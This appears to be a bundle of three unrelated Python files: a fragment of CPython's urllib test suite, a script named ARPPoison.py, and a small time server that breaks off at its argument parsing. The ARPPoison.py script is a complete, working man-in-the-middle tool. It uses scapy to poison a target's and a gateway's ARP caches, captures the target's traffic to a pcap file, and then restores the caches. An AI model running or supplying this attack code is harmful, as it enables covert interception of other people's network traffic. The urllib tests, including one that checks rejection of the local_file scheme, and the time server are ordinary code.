self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append(r'<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
        # Characters in Latin-1 range, encoded with None (the default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
        # Make sure unquoting works when non-quoted characters are
        # interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
        The test cannot assume anything about ordering: the docs make no
        guarantee, and the input may be a dictionary.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
        result = urllib.parse.urlencode(given, doseq=True, safe=":$",
                                        encoding="latin-1")
        self.assertEqual(expect, result)
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
                             'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(FakeHTTPMixin, unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
@support.ignore_warnings(category=DeprecationWarning)
def test_urlopener_retrieve_file(self):
with support.temp_dir() as tmpdir:
fd, tmpfile = tempfile.mkstemp(dir=tmpdir)
os.close(fd)
fileurl = "file:" + urllib.request.pathname2url(tmpfile)
filename, _ = urllib.request.URLopener().retrieve(fileurl)
# Some buildbots have TEMP folder that uses a lowercase drive letter.
self.assertEqual(os.path.normcase(filename), os.path.normcase(tmpfile))
@support.ignore_warnings(category=DeprecationWarning)
def test_urlopener_retrieve_remote(self):
url = "http://www.python.org/file.txt"
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
self.addCleanup(self.unfakehttp)
filename, _ = urllib.request.URLopener().retrieve(url)
self.assertEqual(os.path.splitext(filename)[1], ".txt")
@support.ignore_warnings(category=DeprecationWarning)
def test_local_file_open(self):
# bpo-35907, CVE-2019-9948: urllib must reject local_file:// scheme
class DummyURLopener(urllib.request.URLopener):
def open_local_file(self, url):
return url
for url in ('local_file://example', 'local-file://example'):
self.assertRaises(OSError, urllib.request.urlopen, url)
self.assertRaises(OSError, urllib.request.URLopener().open, url)
self.assertRaises(OSError, urllib.request.URLopener().retrieve, url)
self.assertRaises(OSError, DummyURLopener().open, url)
self.assertRaises(OSError, DummyURLopener().retrieve, url)
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work OK, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
ARPPoison.py
|
from scapy.all import *
import os
import sys
import threading
import signal
import time


def get_mac(ip_address):
    # Broadcast an ARP "who-has" request and return the MAC of the first responder.
    responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
    for s, r in responses:
        return r[Ether].src
    return None


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # Broadcast the correct ARP mappings so the target and gateway recover.
    print "Restoring target"
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    # Signal the main thread so the sniffer stops as well.
    os.kill(os.getpid(), signal.SIGINT)


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # Tell the target we are the gateway, and the gateway we are the target.
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac
    print "Beginning the ARP poison."
    while True:
        try:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            break
    print "ARP poison attack finished."
    return


interface = "en1"
target_ip = ""
gateway_ip = ""
packet_count = 1000
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print "Failed to get gateway MAC."
    sys.exit(0)
else:
    print "Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
    print "Failed to get target MAC."
    sys.exit(0)
else:
    print "Target %s is at %s" % (target_ip, target_mac)
# ARP poisoning starts here.
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
    print "Starting sniffer for %d packets" % packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap('arppoison.pcap', packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)
|
timeserver.py
|
import socket
import threading
import argparse
import time
def run_server(host, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((host, port))
listener.listen(5)
print('Time server is listening at', port)
while True:
conn, addr = listener.accept()
threading.Thread(target=handle_client, args=(conn, addr)).start()
finally:
listener.close()
def handle_client(conn, addr):
print('New client from', addr)
try:
# Number of seconds elapsed from 1900 to 1970
time1970 = 2208988800
now = int(time.time()) + time1970
# Must send uint32 in big-endian
conn.sendall(now.to_bytes(4, byteorder='big'))
finally:
conn.close()
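# A minimal client sketch (an addition, not part of the original script),
# assuming the server above is reachable on localhost: it reads the 4-byte
# big-endian value sent by handle_client() and converts it back to a Unix
# timestamp by subtracting the same 1900-to-1970 offset.
def fetch_time(host='127.0.0.1', port=8037):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.connect((host, port))
        data = client.recv(4)
    return int.from_bytes(data, byteorder='big') - 2208988800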
# Usage: python timeserver.py [--port port-number]
parser = argparse.ArgumentParser()
